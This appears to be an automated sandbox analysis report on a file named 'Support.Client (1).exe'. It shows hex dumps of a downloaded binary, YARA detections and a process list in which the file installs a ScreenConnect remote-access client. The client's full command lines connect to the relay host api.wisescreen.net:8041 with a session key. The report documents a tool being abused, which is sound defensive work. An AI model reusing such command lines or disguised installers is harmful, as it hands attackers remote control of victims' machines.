                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 01 00 11 03 6f 18 07 00 0a 0a 2b 26 06 6f 19 07 00 0a 0b 07 6f 0b 0c 00 06 02 07 04 28 02 0c 00 06 05 07 6f 0a 0c 00 06 28 0b 09 00 06 6f 0d 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 18 07 00 0a 0a 2b 26 06 6f 19 07 00 0a 0b 07 04 07 6f 0b 0c 00 06 02 05 07 6f 0a 0c 00 06 28 0b 09 00 06 6f 0e 0c 00 06 28 03 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b
                                                                                                                        Data Ascii: o+&oo(o(oo-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 00 06 14 0c 02 7b 31 05 00 04 16 e0 2e 0b 02 7b 31 05 00 04 25 4b 06 58 54 03 06 58 10 01 04 06 59 10 02 02 7b 30 05 00 04 7c 88 00 00 04 06 28 57 03 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 62 01 00 0a 0a 03 04 0e 04 0e 05 06 28 34 02 00 0a 06 2a 1a 73 6c 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ad 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 81 01 00 0a 6f 7d 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 8a 01 00 0a 6f 7d 01 00 0a 2a 2e 73 b6 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00
                                                                                                                        Data Ascii: {1.{1%KXTXY{0|(W:j******0iY(b(4*slz(<*.s2*(<*2{3oB*(<*6{o}*(<*6{o}*.s8*(<*"(]*"(c*(<*
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 00 04 2a 32 02 7b 1d 07 00 04 6f 2f 0a 00 0a 2a 22 02 03 7d 1e 07 00 04 2a 32 02 7b 1e 07 00 04 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 46 02 7b 1f 07 00 04 28 57 06 00 06 8c db 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 31 0a 00 0a 16 6f 32 0a 00 0a 2a 36 02 7b 31 0a 00 0a 17 6f 32 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 24 05 00 0a 02 7b 25 05 00 0a 28 33 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 29 05 00 0a 02 7b 2a 05 00 0a 28 33 0a 00 0a 2a 2e 73 0c 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 23 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 10 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 13 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 53 0b 00 06 2a 3a 0f 01 fe 16 4f 01 00
                                                                                                                        Data Ascii: *2{o/*"}*2{o0*(<*F{(W*(<*6{1o2*6{1o2*(<*J{${%(3*(<*J{){*(3*.s%*(<*o#*oC*.s(*(<*oC*.s**(<*"(S*:O
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 01 10 00 23 31 00 00 bf 3d 01 00 6d 00 88 01 ef 02 81 01 10 00 1b 32 00 00 bf 3d 01 00 35 00 89 01 f4 02 81 01 10 00 bd 27 00 00 bf 3d 01 00 35 00 8a 01 f5 02 01 00 10 00 3f 31 00 00 bf 3d 01 00 35 00 8b 01 f7 02 01 00 10 00 4c b0 00 00 bf 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 9b 2e 01 00 bf 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 bf 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 bf 3d 01 00 35 00 90 01 04 03 01 01 00 00 b2 6a 01 00 bf 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 bf 3d 01 00 c5 00 96 01 05 03 09 01 10 00 cc 36 01 00 bf 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 7e 50 01 00 bf 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 bf 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 2e 3b 01 00 bf 3d 01 00 6d 00 a4 01 26 03 09 01 10 00
                                                                                                                        Data Ascii: #1=m2=5'=5?1=5L=E.=mH&=+=5j==6=m~P=mO=m.;=m&


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:12:17:55
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Users\user\Desktop\Support.Client (1).exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Support.Client (1).exe"
                                                                                                                        Imagebase:0x610000
                                                                                                                        File size:83'328 bytes
                                                                                                                        MD5 hash:EE2FD372B98D7899C7E12D85F4C7F695
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:1
                                                                                                                        Start time:12:17:55
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                        Imagebase:0x2cad85b0000
                                                                                                                        File size:24'856 bytes
                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:12:17:56
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                        File size:55'320 bytes
                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:12:17:56
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872
                                                                                                                        Imagebase:0x20000
                                                                                                                        File size:483'680 bytes
                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:12:17:56
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748
                                                                                                                        Imagebase:0x20000
                                                                                                                        File size:483'680 bytes
                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:5
                                                                                                                        Start time:12:17:56
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                        File size:55'320 bytes
                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:9
                                                                                                                        Start time:12:18:24
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"
                                                                                                                        Imagebase:0xf0000
                                                                                                                        File size:602'392 bytes
                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:10
                                                                                                                        Start time:12:18:24
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
                                                                                                                        Imagebase:0xd70000
                                                                                                                        File size:95'512 bytes
                                                                                                                        MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:11
                                                                                                                        Start time:12:18:25
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
                                                                                                                        Imagebase:0xd70000
                                                                                                                        File size:95'512 bytes
                                                                                                                        MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:12
                                                                                                                        Start time:12:18:26
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User"
                                                                                                                        Imagebase:0x810000
                                                                                                                        File size:602'392 bytes
                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:13
                                                                                                                        Start time:12:18:28
                                                                                                                        Start date:13/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System"
                                                                                                                        Imagebase:0x4b0000
                                                                                                                        File size:602'392 bytes
                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:2.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:3.1%
                                                                                                                          Total number of Nodes:1457
                                                                                                                          Total number of Limit Nodes:4
                                                                                                                          execution_graph 6366 618ce1 6367 618d01 6366->6367 6370 618d38 6367->6370 6369 618d2b 6371 618d3f 6370->6371 6372 618da0 6371->6372 6376 618d5f 6371->6376 6373 61988e 6372->6373 6379 619997 6372->6379 6373->6369 6376->6373 6377 619997 16 API calls 6376->6377 6378 6198be 6377->6378 6378->6369 6380 6199a0 6379->6380 6383 61a06f 6380->6383 6382 618dee 6382->6369 6384 61a0ae __startOneArgErrorHandling 6383->6384 6387 61a130 __startOneArgErrorHandling 6384->6387 6389 61a472 6384->6389 6388 61a166 _ValidateLocalCookies 6387->6388 6392 61a786 6387->6392 6388->6382 6399 61a495 6389->6399 6393 61a793 6392->6393 6394 61a7a8 6392->6394 6396 61a7ad 6393->6396 6397 6147f9 _free 15 API calls 6393->6397 6395 6147f9 _free 15 API calls 6394->6395 6395->6396 6396->6388 6398 61a7a0 6397->6398 6398->6388 6400 61a4c0 __raise_exc 6399->6400 6401 61a6b9 RaiseException 6400->6401 6402 61a490 6401->6402 6402->6387 6562 6156a1 6563 6156ac 6562->6563 6564 6159b3 6 API calls 6563->6564 6565 6156d5 6563->6565 6567 6156d1 6563->6567 6564->6563 6568 6156f9 6565->6568 6569 615725 6568->6569 6570 615706 6568->6570 6569->6567 6571 615710 DeleteCriticalSection 6570->6571 6571->6569 6571->6571 5609 619160 5612 61917e 5609->5612 5611 619176 5613 619183 5612->5613 5616 619218 5613->5616 5617 6199d3 5613->5617 5615 6193af 5615->5611 5616->5611 5618 6199f0 DecodePointer 5617->5618 5619 619a00 5617->5619 5618->5619 5620 619a8d 5619->5620 5621 619a82 _ValidateLocalCookies 5619->5621 5623 619a37 5619->5623 5620->5621 5622 6147f9 _free 15 API calls 5620->5622 5621->5615 5622->5621 5623->5621 5624 6147f9 _free 15 API calls 5623->5624 5624->5621 6572 614ba0 6573 614bac 6572->6573 6574 614bb6 FindClose 6573->6574 6575 614bbd _ValidateLocalCookies 6573->6575 6574->6575 5625 614c65 5626 614c6f 5625->5626 5627 614c7f 5626->5627 5628 614869 _free 15 API calls 5626->5628 5629 614869 _free 15 API calls 5627->5629 5628->5626 5630 614c86 5629->5630 6403 6133e5 6404 6133f7 6403->6404 6405 6133fd 6403->6405 6406 613376 15 API calls 6404->6406 6406->6405 5889 616026 5890 61602b 5889->5890 5891 61604e 5890->5891 5893 615c56 5890->5893 5894 615c63 5893->5894 5898 615c85 5893->5898 5895 615c71 DeleteCriticalSection 5894->5895 5896 615c7f 5894->5896 5895->5895 5895->5896 5897 614869 _free 15 API calls 5896->5897 5897->5898 5898->5890 6576 615ba6 6577 615bb1 6576->6577 6579 615bd7 6576->6579 6578 615bc1 FreeLibrary 6577->6578 6577->6579 6578->6577 6407 619beb 6408 619c04 __startOneArgErrorHandling 6407->6408 6410 619c2d __startOneArgErrorHandling 6408->6410 6411 61a1c4 6408->6411 6412 61a1fd __startOneArgErrorHandling 6411->6412 6413 61a495 __raise_exc RaiseException 6412->6413 6414 61a224 __startOneArgErrorHandling 6412->6414 6413->6414 6415 61a267 6414->6415 6417 61a242 6414->6417 6416 61a786 __startOneArgErrorHandling 15 API calls 6415->6416 6419 61a262 __startOneArgErrorHandling _ValidateLocalCookies 6416->6419 6420 61a7b5 6417->6420 6419->6410 6421 61a7c4 6420->6421 6422 61a7e3 __startOneArgErrorHandling 6421->6422 6423 61a838 __startOneArgErrorHandling 6421->6423 6425 61a786 __startOneArgErrorHandling 15 API calls 6422->6425 6426 61a831 6422->6426 6424 61a786 __startOneArgErrorHandling 15 API calls 6423->6424 6424->6426 6425->6426 6426->6419 5899 61452d 5907 615858 5899->5907 5901 614537 5902 614541 5901->5902 5903 6144a8 __dosmaperr 15 API calls 5901->5903 5904 614549 5903->5904 5905 614556 5904->5905 5912 614559 5904->5912 5908 615741 __dosmaperr 5 API calls 5907->5908 5909 61587f 5908->5909 5910 615897 TlsAlloc 5909->5910 5911 615888 _ValidateLocalCookies 5909->5911 5910->5911 5911->5901 5913 614563 5912->5913 5915 614569 5912->5915 5916 6158ae 5913->5916 5915->5902 5917 615741 __dosmaperr 5 API calls 5916->5917 5918 6158d5 5917->5918 5919 6158ed TlsFree 5918->5919 5920 6158e1 _ValidateLocalCookies 5918->5920 5919->5920 5920->5915 5921 614c2c 5922 614bb1 5921->5922 5923 614c4a 5921->5923 5924 614bb6 FindClose 5922->5924 5926 614bbd _ValidateLocalCookies 5922->5926 5927 617570 5923->5927 5924->5926 5928 6175a9 5927->5928 5929 6147f9 _free 15 API calls 5928->5929 5933 6175d5 _ValidateLocalCookies 5928->5933 5930 6175b2 5929->5930 5931 61473d _abort 21 API calls 5930->5931 5932 6175bd _ValidateLocalCookies 5931->5932 5932->5922 5933->5922 5934 61142e 5937 612cf0 5934->5937 5936 61143f 5938 6144a8 __dosmaperr 15 API calls 5937->5938 5939 612d07 _ValidateLocalCookies 5938->5939 5939->5936 6427 618df1 6428 618e15 6427->6428 6429 618e2e 6428->6429 6430 619beb __startOneArgErrorHandling 6428->6430 6432 6199d3 16 API calls 6429->6432 6433 618e78 6429->6433 6431 619c2d __startOneArgErrorHandling 6430->6431 6434 61a1c4 16 API calls 6430->6434 6432->6433 6434->6431 6580 6171b5 6581 6171bd 6580->6581 6582 613f72 __fassign 33 API calls 6581->6582 6586 6171da 6581->6586 6583 6171fa 6582->6583 6583->6586 6592 6181b5 6583->6592 6587 61726e MultiByteToWideChar 6587->6586 6589 61725e 6587->6589 6588 61722e 6588->6589 6591 61723c MultiByteToWideChar 6588->6591 6589->6586 6590 6147f9 _free 15 API calls 6589->6590 6590->6586 6591->6586 6591->6589 6593 613f72 __fassign 33 API calls 6592->6593 6594 617228 6593->6594 6594->6587 6594->6588 6595 613eb5 6596 613eb8 6595->6596 6597 613f24 _abort 33 API calls 6596->6597 6598 613ec4 6597->6598 6435 611ff4 6438 612042 6435->6438 6439 611fff 6438->6439 6440 61204b 6438->6440 6440->6439 6447 6123c3 6440->6447 6443 6123c3 43 API calls 6444 612091 6443->6444 6445 613e89 33 API calls 6444->6445 6446 612099 6445->6446 6461 6123d1 6447->6461 6449 6123c8 6450 612086 6449->6450 6451 616b14 _abort 2 API calls 6449->6451 6450->6443 6452 613f29 6451->6452 6453 613f35 6452->6453 6454 616b6f _abort 33 API calls 6452->6454 6455 613f3e IsProcessorFeaturePresent 6453->6455 6460 613f5c 6453->6460 6454->6453 6457 613f49 6455->6457 6456 613793 _abort 23 API calls 6458 613f66 6456->6458 6459 614573 _abort 3 API calls 6457->6459 6459->6460 6460->6456 6462 6123da 6461->6462 6463 6123dd GetLastError 6461->6463 6462->6449 6473 6126a4 6463->6473 6466 612457 SetLastError 6466->6449 6467 6126df ___vcrt_FlsSetValue 6 API calls 6468 61240b 6467->6468 6469 612433 6468->6469 6470 6126df ___vcrt_FlsSetValue 6 API calls 6468->6470 6472 612411 6468->6472 6471 6126df ___vcrt_FlsSetValue 6 API calls 6469->6471 6469->6472 6470->6469 6471->6472 6472->6466 6474 612543 ___vcrt_FlsGetValue 5 API calls 6473->6474 6475 6126be 6474->6475 6476 6126d6 TlsGetValue 6475->6476 6477 6123f2 6475->6477 6476->6477 6477->6466 6477->6467 6477->6472 6599 614ab7 6604 614c8a 6599->6604 6602 614869 _free 15 API calls 6603 614aca 6602->6603 6609 614cbf 6604->6609 6607 614ac1 6607->6602 6608 614869 _free 15 API calls 6608->6607 6610 614cd1 6609->6610 6611 614c98 6609->6611 6612 614d01 6610->6612 6613 614cd6 6610->6613 6611->6607 6611->6608 6612->6611 6616 61681b 24 API calls 6612->6616 6614 61480c __dosmaperr 15 API calls 6613->6614 6615 614cdf 6614->6615 6617 614869 _free 15 API calls 6615->6617 6618 614d1c 6616->6618 6617->6611 6619 614869 _free 15 API calls 6618->6619 6619->6611 6620 611ab8 6621 611aef 6620->6621 6622 611aca 6620->6622 6622->6621 6629 61209a 6622->6629 6627 613e89 33 API calls 6628 611b0d 6627->6628 6630 6123c3 43 API calls 6629->6630 6631 611afc 6630->6631 6632 6120a3 6631->6632 6633 6123c3 43 API calls 6632->6633 6634 611b06 6633->6634 6634->6627 6478 6112fb 6483 611aac SetUnhandledExceptionFilter 6478->6483 6480 611300 6484 6138f9 6480->6484 6482 61130b 6483->6480 6485 613905 6484->6485 6486 61391f 6484->6486 6485->6486 6487 6147f9 _free 15 API calls 6485->6487 6486->6482 6488 61390f 6487->6488 6489 61473d _abort 21 API calls 6488->6489 6490 61391a 6489->6490 6490->6482 6635 6114bb IsProcessorFeaturePresent 6636 6114d0 6635->6636 6639 611493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6636->6639 6638 6115b3 6639->6638 6640 6179bb 6642 61790a 6640->6642 6641 61791f 6643 6147f9 _free 15 API calls 6641->6643 6644 617924 6641->6644 6642->6641 6642->6644 6647 61795b 6642->6647 6645 61794a 6643->6645 6646 61473d _abort 21 API calls 6645->6646 6646->6644 6647->6644 6648 6147f9 _free 15 API calls 6647->6648 6648->6645 5940 61383f 5941 61384b ___scrt_is_nonwritable_in_current_image 5940->5941 5942 613882 _abort 5941->5942 5948 6156e2 EnterCriticalSection 5941->5948 5944 61385f 5945 6167cb __fassign 15 API calls 5944->5945 5946 61386f 5945->5946 5949 613888 5946->5949 5948->5944 5952 61572a LeaveCriticalSection 5949->5952 5951 61388f 5951->5942 5952->5951 5631 613d41 5634 61341b 5631->5634 5635 61342a 5634->5635 5640 613376 5635->5640 5638 613376 15 API calls 5639 61344f 5638->5639 5641 613383 5640->5641 5642 6133a0 5640->5642 5643 61339a 5641->5643 5644 614869 _free 15 API calls 5641->5644 5642->5638 5645 614869 _free 15 API calls 5643->5645 5644->5641 5645->5642 5957 611e00 5958 611e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 5957->5958 5959 611e9e _ValidateLocalCookies 5958->5959 5962 612340 RtlUnwind 5958->5962 5961 611f27 _ValidateLocalCookies 5962->5961 6491 619ec3 6492 619ed9 6491->6492 6493 619ecd 6491->6493 6493->6492 6494 619ed2 CloseHandle 6493->6494 6494->6492 5646 611442 5647 611a6a GetModuleHandleW 5646->5647 5648 61144a 5647->5648 5649 611480 5648->5649 5650 61144e 5648->5650 5652 613793 _abort 23 API calls 5649->5652 5651 611459 5650->5651 5655 613775 5650->5655 5654 611488 5652->5654 5656 61355e _abort 23 API calls 5655->5656 5657 613780 5656->5657 5657->5651 6495 6198c5 6496 6198ed 6495->6496 6497 619925 6496->6497 6498 619917 6496->6498 6499 61991e 6496->6499 6500 619997 16 API calls 6498->6500 6504 619980 6499->6504 6502 61991c 6500->6502 6505 6199a0 6504->6505 6506 61a06f __startOneArgErrorHandling 16 API calls 6505->6506 6507 619923 6506->6507 5658 619146 IsProcessorFeaturePresent 6649 613d86 6650 611f7d ___scrt_uninitialize_crt 7 API calls 6649->6650 6651 613d8d 6650->6651 6652 611489 6655 611853 6652->6655 6654 61148e 6654->6654 6656 611869 6655->6656 6658 611872 6656->6658 6659 611806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6656->6659 6658->6654 6659->6658 5659 611248 5660 611250 5659->5660 5676 6137f7 5660->5676 5662 61125b 5683 611664 5662->5683 5664 61191f 4 API calls 5666 6112f2 5664->5666 5665 611270 __RTC_Initialize 5674 6112cd 5665->5674 5689 6117f1 5665->5689 5668 611289 5668->5674 5692 6118ab InitializeSListHead 5668->5692 5670 61129f 5693 6118ba 5670->5693 5672 6112c2 5699 613891 5672->5699 5674->5664 5675 6112ea 5674->5675 5677 613806 5676->5677 5678 613829 5676->5678 5677->5678 5679 6147f9 _free 15 API calls 5677->5679 5678->5662 5680 613819 5679->5680 5681 61473d _abort 21 API calls 5680->5681 5682 613824 5681->5682 5682->5662 5684 611670 5683->5684 5685 611674 5683->5685 5684->5665 5686 61191f 4 API calls 5685->5686 5688 611681 ___scrt_release_startup_lock 5685->5688 5687 6116ea 5686->5687 5688->5665 5706 6117c4 5689->5706 5692->5670 5772 613e2a 5693->5772 5695 6118cb 5696 6118d2 5695->5696 5697 61191f 4 API calls 5695->5697 5696->5672 5698 6118da 5697->5698 5698->5672 5700 614424 _abort 33 API calls 5699->5700 5701 61389c 5700->5701 5702 6138d4 5701->5702 5703 6147f9 _free 15 API calls 5701->5703 5702->5674 5704 6138c9 5703->5704 5705 61473d _abort 21 API calls 5704->5705 5705->5702 5707 6117d3 5706->5707 5708 6117da 5706->5708 5712 613c81 5707->5712 5715 613cf1 5708->5715 5711 6117d8 5711->5668 5713 613cf1 24 API calls 5712->5713 5714 613c93 5713->5714 